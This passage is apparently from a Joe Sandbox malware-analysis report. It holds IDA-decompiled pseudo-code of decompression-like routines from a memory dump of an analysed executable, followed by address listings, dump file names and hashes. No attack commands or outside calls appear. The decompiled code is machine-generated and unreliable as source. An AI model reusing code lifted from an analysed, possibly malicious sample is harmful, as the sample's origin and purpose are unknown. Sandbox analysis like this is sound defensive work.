                                                    												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
                                                    												_t689[1] = _t586 & 0x00000007;
                                                    												goto L64;
                                                    											}
                                                    											L48:
                                                    											if(__eflags <= 0) {
                                                    												_t689 = _t684 + 4;
                                                    											} else {
                                                    												_t475 = E00CD8934(_t684 + 4);
                                                    												_t605 = 0x24;
                                                    												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
                                                    												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
                                                    												_t689 = _t684 + 4;
                                                    												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
                                                    												_t610 = _t609 & 0x00000007;
                                                    												 *(_t697 + 0x14) = _t665;
                                                    												 *_t689 = _t665;
                                                    												 *(_t697 + 0x10) = _t610;
                                                    												_t689[1] = _t610;
                                                    											}
                                                    											_t463 = E00CCA89D(_t689);
                                                    											_t464 =  *(_t684 + 0x1efc);
                                                    											_t660 = _t463 & 0x0000fffe;
                                                    											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
                                                    											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
                                                    												L53:
                                                    												_t589 = 0xf;
                                                    												_t465 = _t464 + 1;
                                                    												 *(_t697 + 0x18) = _t589;
                                                    												__eflags = _t465 - _t589;
                                                    												if(_t465 >= _t589) {
                                                    													L59:
                                                    													_t591 = _t689[1] +  *(_t697 + 0x18);
                                                    													 *_t689 =  *_t689 + (_t591 >> 3);
                                                    													_t468 =  *(_t697 + 0x18);
                                                    													_t689[1] = _t591 & 0x00000007;
                                                    													_t593 = 0x10;
                                                    													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
                                                    													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
                                                    													asm("sbb eax, eax");
                                                    													_t469 = _t468 & _t596;
                                                    													__eflags = _t469;
                                                    													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
                                                    													goto L60;
                                                    												}
                                                    												L54:
                                                    												_t598 = _t684 + (_t465 + 0x79f) * 4;
                                                    												while(1) {
                                                    													L55:
                                                    													__eflags = _t660 -  *_t598;
                                                    													if(_t660 <  *_t598) {
                                                    														break;
                                                    													}
                                                    													L56:
                                                    													_t465 = _t465 + 1;
                                                    													_t598 = _t598 + 4;
                                                    													__eflags = _t465 - 0xf;
                                                    													if(_t465 < 0xf) {
                                                    														continue;
                                                    													}
                                                    													L57:
                                                    													goto L59;
                                                    												}
                                                    												L58:
                                                    												 *(_t697 + 0x18) = _t465;
                                                    												goto L59;
                                                    											} else {
                                                    												L52:
                                                    												_t599 = 0x10;
                                                    												_t663 = _t660 >> _t599 - _t464;
                                                    												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
                                                    												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
                                                    												_t689[1] = _t602 & 0x00000007;
                                                    												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
                                                    												L60:
                                                    												_t504 = _t504 + (_t470 & 0x0000ffff);
                                                    												__eflags = _t504;
                                                    												L61:
                                                    												 *(_t697 + 0x18) = _t504;
                                                    												goto L64;
                                                    											}
                                                    										}
                                                    										L45:
                                                    										_t504 = _t450 + 1;
                                                    										goto L61;
                                                    									}
                                                    								}
                                                    								L27:
                                                    								__eflags =  *((char*)(_t684 + 0x4c44));
                                                    								if( *((char*)(_t684 + 0x4c44)) == 0) {
                                                    									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
                                                    									_t525 = _t684 + 0x7c;
                                                    									 *_t525 =  *_t525 + 1;
                                                    									continue;
                                                    								} else {
                                                    									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
                                                    									 *((char*)(E00CD2391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
                                                    									goto L0;
                                                    								}
                                                    							}
                                                    						}
                                                    						L12:
                                                    						__eflags = _t526 -  *(_t684 + 0x7c);
                                                    						if(_t526 ==  *(_t684 + 0x7c)) {
                                                    							goto L17;
                                                    						}
                                                    						L13:
                                                    						E00CD5202(_t684);
                                                    						_t360 =  *(_t684 + 0x4c5c);
                                                    						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
                                                    						if(__eflags > 0) {
                                                    							goto L98;
                                                    						}
                                                    						L14:
                                                    						if(__eflags < 0) {
                                                    							L16:
                                                    							__eflags =  *((char*)(_t684 + 0x4c50));
                                                    							if( *((char*)(_t684 + 0x4c50)) != 0) {
                                                    								L156:
                                                    								 *((char*)(_t684 + 0x4c60)) = 0;
                                                    								goto L98;
                                                    							}
                                                    							goto L17;
                                                    						}
                                                    						L15:
                                                    						_t360 =  *(_t684 + 0x4c58);
                                                    						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
                                                    						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
                                                    							goto L98;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    				}
                                                    			}
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6a2a
                                                    0x00cd6a2d
                                                    0x00cd6a30
                                                    0x00cd6a33
                                                    0x00cd6a36
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6a3c
                                                    0x00cd6a3f
                                                    0x00cd6a42
                                                    0x00cd6a45
                                                    0x00cd6a48
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6a4e
                                                    0x00cd6a51
                                                    0x00cd6a54
                                                    0x00cd6a57
                                                    0x00cd6a5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6a60
                                                    0x00cd6a63
                                                    0x00cd6a66
                                                    0x00cd6a69
                                                    0x00cd6a6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6a72
                                                    0x00cd6a72
                                                    0x00cd6a75
                                                    0x00000000
                                                    0x00cd6a75
                                                    0x00cd6c23
                                                    0x00cd6c23
                                                    0x00cd6c25
                                                    0x00cd6c6b
                                                    0x00cd6c6d
                                                    0x00cd6c6d
                                                    0x00cd6c70
                                                    0x00cd6c74
                                                    0x00cd6c76
                                                    0x00cd6c76
                                                    0x00cd6c79
                                                    0x00cd6c7e
                                                    0x00cd6c83
                                                    0x00cd6c84
                                                    0x00cd6c86
                                                    0x00cd6c88
                                                    0x00cd6c8a
                                                    0x00cd6c8a
                                                    0x00cd6c8a
                                                    0x00cd69f8
                                                    0x00cd69f8
                                                    0x00000000
                                                    0x00cd69f8
                                                    0x00cd6c27
                                                    0x00cd6c29
                                                    0x00cd6c29
                                                    0x00cd6c2c
                                                    0x00cd6c2c
                                                    0x00cd6c2e
                                                    0x00cd6c30
                                                    0x00cd6c36
                                                    0x00cd6c3c
                                                    0x00cd6c42
                                                    0x00cd6c48
                                                    0x00cd6c4e
                                                    0x00cd6c54
                                                    0x00cd6c57
                                                    0x00cd6c5a
                                                    0x00cd6c5c
                                                    0x00cd6c5f
                                                    0x00cd6c61
                                                    0x00cd6c61
                                                    0x00cd6c61
                                                    0x00000000
                                                    0x00cd6bd5
                                                    0x00cd6bd5
                                                    0x00cd6bd5
                                                    0x00cd6bde
                                                    0x00cd6bdf
                                                    0x00cd678e
                                                    0x00cd678e
                                                    0x00cd6795
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62cd
                                                    0x00cd62cd
                                                    0x00000000
                                                    0x00cd6c94
                                                    0x00cd6c94
                                                    0x00cd6c97
                                                    0x00cd6c97
                                                    0x00cd6c9f
                                                    0x00cd6ca5
                                                    0x00cd6ca5
                                                    0x00cd6cab
                                                    0x00cd6cad
                                                    0x00cd6cb1
                                                    0x00cd6cb7
                                                    0x00cd6cbe
                                                    0x00cd6cc0
                                                    0x00cd6cc3
                                                    0x00cd6cc3
                                                    0x00cd6cc3
                                                    0x00cd6cc8
                                                    0x00cd6ccb
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62cd
                                                    0x00cd62d3
                                                    0x00cd62de
                                                    0x00000000
                                                    0x00cd62e0
                                                    0x00cd62e0
                                                    0x00000000
                                                    0x00cd62e0
                                                    0x00cd62de
                                                    0x00cd68fb
                                                    0x00cd6902
                                                    0x00cd6907
                                                    0x00cd6907
                                                    0x00000000
                                                    0x00cd68a9
                                                    0x00cd68a9
                                                    0x00cd68ac
                                                    0x00cd68ac
                                                    0x00cd68b4
                                                    0x00cd68ba
                                                    0x00cd68be
                                                    0x00cd68be
                                                    0x00cd68c4
                                                    0x00cd68c6
                                                    0x00cd68ca
                                                    0x00cd68d0
                                                    0x00cd68d7
                                                    0x00cd68d9
                                                    0x00cd68dc
                                                    0x00cd68dc
                                                    0x00cd68dc
                                                    0x00000000
                                                    0x00cd68e1
                                                    0x00cd62ca
                                                    0x00cd6bd3
                                                    0x00cd6b23
                                                    0x00cd6b29
                                                    0x00cd6b2c
                                                    0x00cd6b2c
                                                    0x00cd6b2c
                                                    0x00cd6b2e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6b30
                                                    0x00cd6b30
                                                    0x00cd6b31
                                                    0x00cd6b34
                                                    0x00cd6b37
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6b39
                                                    0x00000000
                                                    0x00cd6b39
                                                    0x00cd6b3b
                                                    0x00cd6b3b
                                                    0x00000000
                                                    0x00cd6b3b
                                                    0x00cd6aed
                                                    0x00cd6aef
                                                    0x00cd6af2
                                                    0x00cd6afc
                                                    0x00cd6b04
                                                    0x00cd6b07
                                                    0x00cd6b0a
                                                    0x00cd6b0d
                                                    0x00cd6b15
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6abf
                                                    0x00cd6abf
                                                    0x00cd6ac2
                                                    0x00cd6ac4
                                                    0x00cd6ac7
                                                    0x00cd6ac7
                                                    0x00cd6ac7
                                                    0x00000000
                                                    0x00cd6abf
                                                    0x00cd692c
                                                    0x00cd692c
                                                    0x00cd692f
                                                    0x00cd6931
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00000000
                                                    0x00cd62ca
                                                    0x00cd62ca
                                                    0x00cd6937
                                                    0x00cd6937
                                                    0x00cd693e
                                                    0x00cd6952
                                                    0x00cd6952
                                                    0x00cd695d
                                                    0x00cd6960
                                                    0x00cd6965
                                                    0x00cd6967
                                                    0x00cd6969
                                                    0x00cd6a7d
                                                    0x00cd6a7d
                                                    0x00cd6a83
                                                    0x00cd6a83
                                                    0x00cd6a89
                                                    0x00cd6a8b
                                                    0x00cd6a8f
                                                    0x00cd6a95
                                                    0x00cd6a9c
                                                    0x00cd6a9e
                                                    0x00cd6aa1
                                                    0x00cd6aa1
                                                    0x00cd6aa1
                                                    0x00000000
                                                    0x00cd6aa6
                                                    0x00cd696f
                                                    0x00cd696f
                                                    0x00cd6971
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6977
                                                    0x00cd6977
                                                    0x00cd697d
                                                    0x00cd6981
                                                    0x00cd6987
                                                    0x00cd6988
                                                    0x00cd698b
                                                    0x00cd698d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd698f
                                                    0x00cd698f
                                                    0x00cd6991
                                                    0x00cd69d4
                                                    0x00cd69d6
                                                    0x00cd69d6
                                                    0x00cd69d9
                                                    0x00cd69dd
                                                    0x00cd69df
                                                    0x00cd69df
                                                    0x00cd69e2
                                                    0x00cd69e7
                                                    0x00cd69ec
                                                    0x00cd69ed
                                                    0x00cd69ef
                                                    0x00cd69f1
                                                    0x00cd69f3
                                                    0x00cd69f3
                                                    0x00cd69f3
                                                    0x00000000
                                                    0x00cd69df
                                                    0x00cd6993
                                                    0x00cd6995
                                                    0x00cd6995
                                                    0x00cd6998
                                                    0x00cd6998
                                                    0x00cd699a
                                                    0x00cd699c
                                                    0x00cd69a2
                                                    0x00cd69a8
                                                    0x00cd69ae
                                                    0x00cd69b4
                                                    0x00cd69ba
                                                    0x00cd69c0
                                                    0x00cd69c3
                                                    0x00cd69c6
                                                    0x00cd69c8
                                                    0x00cd69cb
                                                    0x00cd69cd
                                                    0x00cd69cd
                                                    0x00cd69cd
                                                    0x00000000
                                                    0x00cd69d2
                                                    0x00cd6940
                                                    0x00cd6940
                                                    0x00cd6949
                                                    0x00cd694a
                                                    0x00000000
                                                    0x00cd694a
                                                    0x00cd68ea
                                                    0x00cd68f0
                                                    0x00cd68f2
                                                    0x00cd68f7
                                                    0x00cd68f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd68f9
                                                    0x00cd64a9
                                                    0x00cd64a9
                                                    0x00cd64af
                                                    0x00cd64b2
                                                    0x00cd64c8
                                                    0x00cd64cb
                                                    0x00cd64d1
                                                    0x00cd64d4
                                                    0x00cd64d6
                                                    0x00cd64da
                                                    0x00cd64df
                                                    0x00cd64e5
                                                    0x00cd64f0
                                                    0x00cd64f7
                                                    0x00cd64f9
                                                    0x00cd64f9
                                                    0x00cd64fc
                                                    0x00cd6500
                                                    0x00cd6503
                                                    0x00cd6503
                                                    0x00cd64b4
                                                    0x00cd64b4
                                                    0x00cd64b8
                                                    0x00cd64b8
                                                    0x00cd6508
                                                    0x00cd650f
                                                    0x00cd6515
                                                    0x00cd651b
                                                    0x00cd6522
                                                    0x00cd6561
                                                    0x00cd6563
                                                    0x00cd6564
                                                    0x00cd6565
                                                    0x00cd6567
                                                    0x00cd6583
                                                    0x00cd6586
                                                    0x00cd658a
                                                    0x00cd658d
                                                    0x00cd6593
                                                    0x00cd659d
                                                    0x00cd65a0
                                                    0x00cd65a6
                                                    0x00cd65a9
                                                    0x00cd65b6
                                                    0x00cd65b8
                                                    0x00cd65be
                                                    0x00cd65c0
                                                    0x00cd65c0
                                                    0x00cd65c2
                                                    0x00000000
                                                    0x00cd65c2
                                                    0x00cd6569
                                                    0x00cd656f
                                                    0x00cd6572
                                                    0x00cd6572
                                                    0x00cd6572
                                                    0x00cd6574
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6576
                                                    0x00cd6576
                                                    0x00cd6577
                                                    0x00cd657a
                                                    0x00cd657d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd657f
                                                    0x00000000
                                                    0x00cd657f
                                                    0x00cd6581
                                                    0x00cd6581
                                                    0x00000000
                                                    0x00cd6524
                                                    0x00cd6524
                                                    0x00cd6526
                                                    0x00cd6529
                                                    0x00cd652b
                                                    0x00cd6537
                                                    0x00cd653e
                                                    0x00cd6542
                                                    0x00cd6545
                                                    0x00cd6549
                                                    0x00cd6550
                                                    0x00cd6553
                                                    0x00cd6557
                                                    0x00cd65ca
                                                    0x00cd65ca
                                                    0x00cd65cd
                                                    0x00cd65d0
                                                    0x00cd65da
                                                    0x00cd65e4
                                                    0x00cd65e9
                                                    0x00cd65ea
                                                    0x00cd65ee
                                                    0x00cd65f0
                                                    0x00cd65f4
                                                    0x00cd65f6
                                                    0x00cd6744
                                                    0x00cd6744
                                                    0x00cd6747
                                                    0x00cd6747
                                                    0x00cd674d
                                                    0x00cd674f
                                                    0x00cd6750
                                                    0x00cd6756
                                                    0x00cd6758
                                                    0x00cd6759
                                                    0x00cd675f
                                                    0x00cd6761
                                                    0x00cd6761
                                                    0x00cd6761
                                                    0x00cd675f
                                                    0x00cd6756
                                                    0x00cd6765
                                                    0x00cd676b
                                                    0x00cd6771
                                                    0x00cd6774
                                                    0x00cd6777
                                                    0x00cd677e
                                                    0x00cd6781
                                                    0x00cd679f
                                                    0x00cd679f
                                                    0x00cd67aa
                                                    0x00cd67ac
                                                    0x00cd67b1
                                                    0x00cd67b5
                                                    0x00cd67b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd67bd
                                                    0x00cd67bd
                                                    0x00cd67bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd67c5
                                                    0x00cd67c5
                                                    0x00cd67cd
                                                    0x00cd67d0
                                                    0x00cd67d6

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                    • Instruction ID: 4800f88b1e86e75450f3dcfaaf6479dd8a6896d350295f639f1d86295592b76c
                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                    • Instruction Fuzzy Hash: 8062D8716047849FCB25CF38C8906B9BBE1AF95304F08896FD9EA8B346D734EA45DB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 98%
                                                    			E00CD77EF(signed int __ecx) {
                                                    				signed int _t363;
                                                    				signed int _t367;
                                                    				signed int _t368;
                                                    				signed int _t369;
                                                    				signed int _t373;
                                                    				signed int _t374;
                                                    				signed int _t375;
                                                    				signed int _t376;
                                                    				signed int _t377;
                                                    				signed int _t378;
                                                    				signed int _t381;
                                                    				signed int _t382;
                                                    				signed int _t383;
                                                    				void* _t385;
                                                    				signed int _t388;
                                                    				signed int _t389;
                                                    				intOrPtr _t391;
                                                    				signed int _t401;
                                                    				char _t410;
                                                    				unsigned int _t411;
                                                    				void* _t421;
                                                    				signed int _t422;
                                                    				signed int _t423;
                                                    				intOrPtr _t425;
                                                    				signed int _t428;
                                                    				char _t437;
                                                    				signed int _t439;
                                                    				signed int _t441;
                                                    				signed int _t444;
                                                    				signed int* _t445;
                                                    				signed int _t446;
                                                    				signed int _t447;
                                                    				signed int _t448;
                                                    				signed int _t452;
                                                    				signed int _t453;
                                                    				signed int _t454;
                                                    				signed int _t457;
                                                    				void* _t462;
                                                    				signed int _t463;
                                                    				signed int _t464;
                                                    				intOrPtr _t466;
                                                    				signed int _t469;
                                                    				char _t478;
                                                    				unsigned int _t479;
                                                    				signed int* _t483;
                                                    				signed int _t484;
                                                    				signed int _t485;
                                                    				signed int _t486;
                                                    				signed int _t491;
                                                    				signed int _t492;
                                                    				signed short _t493;
                                                    				unsigned int _t499;
                                                    				signed int _t500;
                                                    				signed int* _t506;
                                                    				unsigned int _t507;
                                                    				intOrPtr _t520;
                                                    				intOrPtr* _t521;
                                                    				intOrPtr _t523;
                                                    				signed int* _t524;
                                                    				signed int _t525;
                                                    				intOrPtr _t526;
                                                    				signed int _t528;
                                                    				void* _t529;
                                                    				signed int _t532;
                                                    				signed int* _t534;
                                                    				unsigned int _t537;
                                                    				signed int _t538;
                                                    				void* _t539;
                                                    				signed int _t542;
                                                    				signed int _t544;
                                                    				signed int _t547;
                                                    				void* _t549;
                                                    				unsigned int _t552;
                                                    				signed int _t553;
                                                    				intOrPtr* _t555;
                                                    				void* _t556;
                                                    				signed int _t559;
                                                    				signed int _t560;
                                                    				signed int _t561;
                                                    				signed int _t564;
                                                    				signed int* _t569;
                                                    				void* _t570;
                                                    				signed int _t573;
                                                    				signed int _t575;
                                                    				signed int _t577;
                                                    				signed int _t580;
                                                    				void* _t582;
                                                    				unsigned int _t585;
                                                    				signed int _t586;
                                                    				signed int _t588;
                                                    				signed int _t590;
                                                    				void* _t592;
                                                    				signed int _t595;
                                                    				intOrPtr* _t597;
                                                    				void* _t598;
                                                    				signed int _t601;
                                                    				void* _t604;
                                                    				signed int _t607;
                                                    				signed int _t608;
                                                    				intOrPtr* _t610;
                                                    				void* _t611;
                                                    				signed int _t614;
                                                    				signed int _t615;
                                                    				void* _t617;
                                                    				signed int _t620;
                                                    				intOrPtr* _t623;
                                                    				void* _t624;
                                                    				signed int _t628;
                                                    				unsigned int _t630;
                                                    				signed int _t633;
                                                    				signed int _t634;
                                                    				signed int _t635;
                                                    				unsigned int _t637;
                                                    				signed int _t640;
                                                    				void* _t643;
                                                    				signed int* _t644;
                                                    				signed int _t645;
                                                    				signed int _t646;
                                                    				void* _t649;
                                                    				unsigned int _t651;
                                                    				signed int _t654;
                                                    				signed int _t658;
                                                    				void* _t661;
                                                    				signed int* _t662;
                                                    				unsigned int _t664;
                                                    				signed int _t667;
                                                    				signed int _t669;
                                                    				signed int _t670;
                                                    				signed int _t671;
                                                    				intOrPtr* _t672;
                                                    				signed int _t673;
                                                    				signed int* _t674;
                                                    				signed int _t676;
                                                    				signed int _t677;
                                                    				unsigned int _t681;
                                                    				signed int _t682;
                                                    				signed int _t686;
                                                    				signed int _t687;
                                                    				signed int _t688;
                                                    				signed int _t689;
                                                    				signed int* _t690;
                                                    				signed int* _t691;
                                                    				signed int* _t692;
                                                    				signed int _t694;
                                                    				unsigned int _t696;
                                                    				signed int _t697;
                                                    				signed int _t698;
                                                    				signed int* _t699;
                                                    				signed int _t702;
                                                    				signed int _t704;
                                                    				signed int _t705;
                                                    				signed int _t707;
                                                    				signed int _t709;
                                                    				char* _t710;
                                                    				signed int _t711;
                                                    				unsigned int _t713;
                                                    				signed int _t714;
                                                    				signed int _t715;
                                                    				signed int _t716;
                                                    				signed int _t723;
                                                    				signed int _t724;
                                                    				void* _t725;
                                                    
                                                    				_t520 =  *((intOrPtr*)(_t725 + 0x40));
                                                    				_t686 = __ecx;
                                                    				_t692 = _t520 + 4;
                                                    				 *(_t725 + 0x24) = __ecx;
                                                    				_t672 = _t520 + 0x18;
                                                    				 *(_t725 + 0x10) = _t692;
                                                    				if( *((char*)(_t520 + 0x2c)) != 0) {
                                                    					 *(_t725 + 0x10) = _t692;
                                                    					L4:
                                                    					_t523 =  *_t672;
                                                    					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
                                                    						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
                                                    						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
                                                    						 *(_t725 + 0x18) = _t363;
                                                    						 *(_t725 + 0x14) = _t694;
                                                    						 *(_t725 + 0x2c) = _t363;
                                                    						__eflags = _t363 - _t694;
                                                    						if(_t363 >= _t694) {
                                                    							 *(_t725 + 0x2c) = _t694;
                                                    						}
                                                    						_t524 =  *(_t725 + 0x10);
                                                    						while(1) {
                                                    							_t673 =  *(_t686 + 0xe6dc);
                                                    							_t628 =  *(_t686 + 0x7c) & _t673;
                                                    							 *(_t686 + 0x7c) = _t628;
                                                    							_t525 =  *_t524;
                                                    							__eflags = _t525 -  *(_t725 + 0x2c);
                                                    							if(_t525 <  *(_t725 + 0x2c)) {
                                                    								goto L19;
                                                    							}
                                                    							L13:
                                                    							__eflags = _t525 - _t363;
                                                    							if(__eflags > 0) {
                                                    								L145:
                                                    								return 1;
                                                    							}
                                                    							if(__eflags != 0) {
                                                    								L16:
                                                    								__eflags = _t525 - _t705;
                                                    								if(_t525 < _t705) {
                                                    									L18:
                                                    									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
                                                    									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
                                                    										L144:
                                                    										 *((char*)(_t520 + 0x4ad3)) = 1;
                                                    										goto L145;
                                                    									}
                                                    									goto L19;
                                                    								}
                                                    								__eflags =  *((char*)(_t520 + 0x4ad2));
                                                    								if( *((char*)(_t520 + 0x4ad2)) == 0) {
                                                    									goto L144;
                                                    								}
                                                    								goto L18;
                                                    							}
                                                    							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
                                                    							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
                                                    								goto L145;
                                                    							}
                                                    							goto L16;
                                                    							L19:
                                                    							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
                                                    							__eflags = (_t526 - _t628 & _t673) - 0x1004;
                                                    							if((_t526 - _t628 & _t673) >= 0x1004) {
                                                    								L24:
                                                    								_t674 =  *(_t725 + 0x10);
                                                    								_t367 = E00CCA89D(_t674);
                                                    								_t368 =  *(_t520 + 0xb4);
                                                    								_t630 = _t367 & 0x0000fffe;
                                                    								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
                                                    								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
                                                    									_t528 = 0xf;
                                                    									_t369 = _t368 + 1;
                                                    									 *(_t725 + 0x28) = _t528;
                                                    									__eflags = _t369 - _t528;
                                                    									if(_t369 >= _t528) {
                                                    										L32:
                                                    										_t696 = _t674[1] + _t528;
                                                    										_t697 = _t696 & 0x00000007;
                                                    										 *_t674 =  *_t674 + (_t696 >> 3);
                                                    										 *(_t725 + 0x1c) =  *_t674;
                                                    										_t373 =  *(_t725 + 0x28);
                                                    										_t674[1] = _t697;
                                                    										_t529 = 0x10;
                                                    										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
                                                    										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
                                                    										asm("sbb eax, eax");
                                                    										_t374 = _t373 & _t532;
                                                    										__eflags = _t374;
                                                    										_t524 =  *(_t725 + 0x10);
                                                    										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
                                                    										_t375 =  *(_t725 + 0x1c);
                                                    										L33:
                                                    										_t634 = _t633 & 0x0000ffff;
                                                    										__eflags = _t634 - 0x100;
                                                    										if(_t634 >= 0x100) {
                                                    											__eflags = _t634 - 0x106;
                                                    											if(_t634 < 0x106) {
                                                    												__eflags = _t634 - 0x100;
                                                    												if(_t634 != 0x100) {
                                                    													__eflags = _t634 - 0x101;
                                                    													if(_t634 != 0x101) {
                                                    														_t635 = _t634 + 0xfffffefe;
                                                    														__eflags = _t635;
                                                    														_t534 = _t686 + (_t635 + 0x18) * 4;
                                                    														_t698 =  *_t534;
                                                    														 *(_t725 + 0x28) = _t698;
                                                    														if(_t635 == 0) {
                                                    															L117:
                                                    															 *(_t686 + 0x60) = _t698;
                                                    															_t699 =  *(_t725 + 0x10);
                                                    															_t376 = E00CCA89D(_t699);
                                                    															_t377 =  *(_t520 + 0x2d78);
                                                    															_t637 = _t376 & 0x0000fffe;
                                                    															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
                                                    															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
                                                    																_t676 = 0xf;
                                                    																_t378 = _t377 + 1;
                                                    																__eflags = _t378 - _t676;
                                                    																if(_t378 >= _t676) {
                                                    																	L125:
                                                    																	_t537 = _t699[1] + _t676;
                                                    																	_t538 = _t537 & 0x00000007;
                                                    																	_t699[1] = _t538;
                                                    																	 *_t699 =  *_t699 + (_t537 >> 3);
                                                    																	_t381 =  *_t699;
                                                    																	 *(_t725 + 0x34) = _t538;
                                                    																	_t539 = 0x10;
                                                    																	 *(_t725 + 0x30) = _t381;
                                                    																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
                                                    																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
                                                    																	asm("sbb eax, eax");
                                                    																	_t382 = _t381 & _t542;
                                                    																	__eflags = _t382;
                                                    																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
                                                    																	L126:
                                                    																	_t677 = _t383 & 0x0000ffff;
                                                    																	__eflags = _t677 - 8;
                                                    																	if(_t677 >= 8) {
                                                    																		_t702 = (_t677 >> 2) - 1;
                                                    																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
                                                    																		__eflags = _t702;
                                                    																		if(_t702 != 0) {
                                                    																			_t411 = E00CCA89D( *(_t725 + 0x10));
                                                    																			_t644 =  *(_t725 + 0x10);
                                                    																			_t549 = 0x10;
                                                    																			_t681 = _t681 + (_t411 >> _t549 - _t702);
                                                    																			_t552 =  *(_t725 + 0x34) + _t702;
                                                    																			_t553 = _t552 & 0x00000007;
                                                    																			__eflags = _t553;
                                                    																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
                                                    																			_t644[1] = _t553;
                                                    																		}
                                                    																	} else {
                                                    																		_t681 = _t677 + 2;
                                                    																	}
                                                    																	_t640 =  *(_t686 + 0x7c);
                                                    																	_t544 =  *(_t725 + 0x28);
                                                    																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                                                    																	_t704 = _t640 - _t544;
                                                    																	 *(_t686 + 0x74) = _t681;
                                                    																	__eflags = _t704 - _t385;
                                                    																	if(_t704 >= _t385) {
                                                    																		L140:
                                                    																		_t524 =  *(_t725 + 0x10);
